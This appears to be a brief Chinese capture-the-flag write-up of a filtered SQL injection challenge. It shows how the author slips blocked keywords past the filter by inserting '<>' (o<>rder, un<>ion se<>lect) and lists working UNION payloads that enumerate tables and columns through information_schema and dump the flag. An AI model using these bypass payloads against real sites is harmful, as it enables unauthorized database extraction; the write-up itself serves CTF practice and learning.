1、打开题目 提示flag通过注入拿到
2、开始常规的进行SQL注入
输入‘ order by 1 发现被过滤了
字符&&和||替换进行替换and 和or
发现没有显示过滤
发现order by被拦截
同样注释/**/也会被拦截。尝试用<>把字符隔
开。这里需要注意or<>der隔开是不对的,因为or又是一个被拦截的字符
所以使用 1 o<>rder by 1
发现没有被过滤 接下来就进行 常规的注入操作
得到字段有3 个
使用union查询 得到字段位置
1 un<>ion se<>lect 1,2,3 –
3、
?id=1 un<>ion se<>lect 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() – //数据
?id=1 un<>ion se<>lect 1,group_concat(column_name),3 from information_schema.columns where table_name =‘info’ – // 爆字段
?id=1 un<>ion se<>lect 1,group_concat(flAg_T5ZNdrm),3%20from%20info%20-- //爆数据
提交flag 即可